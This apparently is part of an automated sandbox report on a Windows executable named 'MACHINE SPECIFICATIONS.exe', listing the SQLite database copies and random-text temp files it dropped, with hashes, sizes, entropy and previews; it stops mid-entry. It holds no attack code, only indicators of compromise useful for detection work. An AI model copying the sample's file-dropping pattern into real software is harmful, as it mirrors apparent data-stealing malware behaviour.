                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\tmp5EA.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\tmp6B6.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\tmp744.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\tmp7DDD.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\tmp8DB.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\tmp8DF4.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1026
                                                                                  Entropy (8bit):4.685942106278079
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
                                                                                  MD5:3F6896A097F6B0AE6A2BF3826C813DFC
                                                                                  SHA1:951214AB37DEA766005DD981B0B3D61F936B035B
                                                                                  SHA-256:E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
                                                                                  SHA-512:C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
                                                                                  Malicious:false
                                                                                  Preview:PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

                                                                                  C:\Users\user\AppData\Local\Temp\tmpA1DA.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1026
                                                                                  Entropy (8bit):4.701704028955216
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
                                                                                  MD5:5F97B24D9F05FA0379F5E540DA8A05B0
                                                                                  SHA1:D4E1A893EFD370529484B46EE2F40595842C849E
                                                                                  SHA-256:58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
                                                                                  SHA-512:A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
                                                                                  Malicious:false
                                                                                  Preview:BNAGMGSPLOQNKLVQWYYWYGDTNIHHPSGKYBNBNGFSZGYYFUVNSOYTAMZPOIOKMFFWDJIYCJGTWZSMXADBSJDEKDTPXDVYBIZFLSTFISYXAKAYQWPLDFAWXXNTSVHRLCINNTRJHMBFQAQBHFRSHDDRJZGIFSOFSRODXCWFIUZRXRQSOCPSXKXNEHLQYKIBJRTMMHJOIZSWESTHTXPULAPGLZHBOLMPQWYSWWOGRJQGYWDWWZMHZMTDMRWBSPIXHCFFOHTJSOAULKIFZVXPTYEBTBEXGQNBQAECQOJGHTKIAXUJLSLPBKTTRORROLNTKPDPOMSZBBLUYFRZXYZSVBGBEMGTACDCBJNXKAMZMCYEWGKSUENLKBJSZIPKQGYXMJTJXBELNVMAZHRUESZSTWROIUXLLMQPYLVQYLCOMOCGPSMJQGILSDDRUUXDRUCCVECNPLWHJLTHCPBZIKDUNRJMJIOQOCHVVNIQFFXFKFHTCVEEAXHTLJMWIUAWAMHGIGQCQJZGXBEDCRRZCNVYKCPWVJCRXIGXZYJENNARSZZREAOODIGZVBXFPAHTZNKNQHLNNETJICOVQGFLQSGSLCOYMPYDSGOPNUXAMCIJBJPJBAABYHKBKWCUAXUHNOCSSTHZYJXPLMFVJQAJDDSNEVXLRUYEQEKUKUIAOQAQJMNLHOUFLFUDMCWRNYNNLOACVSDXDNNBOGQOYGOZTWUOFZYLZQXJEGPQNQFLLILMQUJLCLUOOAOAQRCWMGKHGFJRPSFVQPCSCUDFVYSGDQIHJWSUDEAMVIANGMMFSJJTPNRYYSJYDFLUXJZGSYAAUHOEPMQIZZRSZDCXHRCIPUERSVKWEBDJCXEWWKPAHBVZESVEWPJTYRBKLHQRRPGDGQPGTNNFRMWNTGWIZDBPSGFQDFZWTVLRAOKRBHWFHBPZUBSCFBAMHEWXUIUXMKHPOCNYWNKSRYBQKSUWJLJRNBFNMTDBSZDXVFSLPDQEDCNYELVD

                                                                                  C:\Users\user\AppData\Local\Temp\tmpC542.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1026
                                                                                  Entropy (8bit):4.685942106278079
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
                                                                                  MD5:3F6896A097F6B0AE6A2BF3826C813DFC
                                                                                  SHA1:951214AB37DEA766005DD981B0B3D61F936B035B
                                                                                  SHA-256:E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
                                                                                  SHA-512:C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
                                                                                  Malicious:false
                                                                                  Preview:PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

                                                                                  C:\Users\user\AppData\Local\Temp\tmpD3.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\tmpEAF9.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1026
                                                                                  Entropy (8bit):4.69422273140364
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
                                                                                  MD5:A686C2E2230002C3810CB3638589BF01
                                                                                  SHA1:4B764DD14070E52A2AC0458F401CDD5724E714FB
                                                                                  SHA-256:38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
                                                                                  SHA-512:1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
                                                                                  Malicious:false
                                                                                  Preview:SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

                                                                                  C:\Users\user\AppData\Local\Temp\tmpF66A.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.792852251086831
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                  MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                  SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                  SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                  SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\tmpF736.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:modified
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.792852251086831
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                  MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                  SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                  SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                  SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\tmpF88F.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.792852251086831
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                  MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                  SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                  SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                  SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\tmpF98A.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.792852251086831
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                  MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                  SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                  SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                  SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\tmpFA56.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.792852251086831
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                  MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                  SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                  SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                  SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\tmpFB22.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.792852251086831
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                  MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                  SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                  SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                  SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\tmpFCBA.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6970840431455908
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                  MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                  SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                  SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                  SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\tmpFDE3.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6970840431455908
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                  MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                  SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                  SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                  SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\tmpFF0D.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
